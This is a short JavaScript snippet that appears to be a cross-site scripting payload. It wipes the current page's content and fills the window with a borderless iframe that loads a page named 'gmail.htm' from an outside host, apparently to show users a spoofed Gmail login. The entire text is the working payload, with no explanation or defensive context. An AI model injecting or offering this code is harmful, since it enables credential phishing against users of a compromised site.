document.body.innerHTML = '';
var igoogle = document.createElement('iframe');
igoogle.src = 'http://www.sinfocol.org/archivos/2009/11/gmail.htm';
igoogle.style.width = '100%';
igoogle.style.height = '100%';
igoogle.style.border = '0';
void(document.body.appendChild(igoogle));